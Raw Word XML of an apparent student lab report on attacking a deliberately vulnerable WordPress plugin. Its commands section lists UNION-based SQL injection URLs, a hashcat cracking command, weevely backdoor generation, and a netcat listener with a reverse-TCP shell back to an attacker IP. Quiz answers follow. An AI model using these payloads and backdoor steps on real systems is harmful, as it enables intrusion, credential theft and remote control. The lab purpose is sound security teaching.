                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="281072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9">
      <w:pPr>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943600" cy="4305300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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4305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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 9: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Logging into the website with the username “test” and password “test” which we retrieved using SQL injection. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr>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943600" cy="4305300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6"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4305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956957" cy="2304659"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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56957" cy="230465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6E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 10: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here we get all the details of the admin since we’ve successfully penetrated the website and managed to get the account details.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="9.2401123046875" w:firstLine="0"/>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943600" cy="4020398"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4" name="image9.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image9.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:srcRect b="6617" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="402039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widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="9.2401123046875" w:firstLine="0"/>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3767793" cy="3429658"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="14"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767793" cy="342965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1">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>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B.2 Commands/tools used with the syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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73">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>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http://acunetix.php.example/wordpress/wp-content/plugins/demo_vul/endpoint.php?user=1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>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http://acunetix.php.example/wordpress/wp-content/plugins/demo_vul/endpoint.php?user=1+ORDER+BY+10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>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http://acunetix.php.example/wordpress/wp-content/plugins/demo_vul/endpoint.php?user=-1+union+select+1,2,3,4,5,6,7,8,9</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">,(SELECT+group_concat(table_name)+from+information_schema.tables+where+table_schema=database())</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>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hashcat64 -m 400 -a 0 hash.txt wordlist.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>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-m = the type of hash we want to crack. 400 is the hash type for WordPress (MD5)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>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 = the attack mode. 0 is the Dictionary (or Straight) Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>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hash.txt = a file containing the hash we want to crack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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wordlist.txt = a file containing a list of passwords in plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>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secuser@secureserver:~/weevely3-master# ./weevely.py generate abcd123 agent.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>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Generated backdoor with password 'abcd123' in 'agent.php' of 1332 byte size.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>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Usage: ./weevely.py [URL] [AGENT_PASSWORD]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>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root@secureserver:~/weevely3-master# ./weevely.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>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http://acunetix.php.example/wordpress/ abcd123</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>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root@secureserver:~/weevely3-master# nc -l -v -p 8181</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>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listening on [any] 8181 …</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>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www-data@targetmachine:/var/www/html/wordpress $ backdoor_reversetcp 192.168.2.112 8181</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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w/html/wordpress $</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
      <w:pPr>
        <w:spacing w:after="0" w:line="276"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86">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>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87">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>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88">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>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89">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>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8A">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>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8B">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>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8C">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>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8D">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>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8E">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>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8F">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>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B.3 Question of Curiosity:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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What is SQL injection?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ans:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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SQL Injection (SQLi) is a type of injection attack that makes it possible to execute malicious SQL statements. These statements control a database server behind a web application. Attackers can use SQL Injection vulnerabilities to bypass application security measures. They can go around authentication and authorization of a web page or web application and retrieve the content of the entire SQL database. They can also use SQL Injection to add, modify, and delete records in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">
      <w:pPr>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4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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What is the query that makes SQL injection possible?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ans:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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In SQL Injection, the UNION operator is commonly used to attach a malicious SQL query to the original query intended to be run by the web application. The result of the injected query will be joined with the result of the original query. This allows the attacker to obtain column values from other tables.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097">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8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Explain “ OR 1 = 1” and what happens to SQL when this condition is used in the query.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000099">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ans:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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We are selecting the password from the table where the user name is admin. We are also pulling the password from the table where ever 1=1 - which is always true. Each row is evaluated to true, thus all passwords are returned. A hacker might get access to all the user names and passwords in a database, by simply inserting 105 OR 1=1 into the input field.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>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9C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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B.4 Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Write an appropriate conclusion.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009F">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After successful execution of this experiment, we can set up firewalls and intrusion detection systems using open source technologies and explore email security and explore various attacks like buffer overflow, SQL injection and web-application attacks.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footerReference r:id="rId23" w:type="default"/>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Play">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0">
    <w:pPr>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
        <w:b w:val="1"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
        <w:b w:val="1"/>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widowControl w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="712"/>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17.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.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2.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.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15.png"/><Relationship Id="rId18"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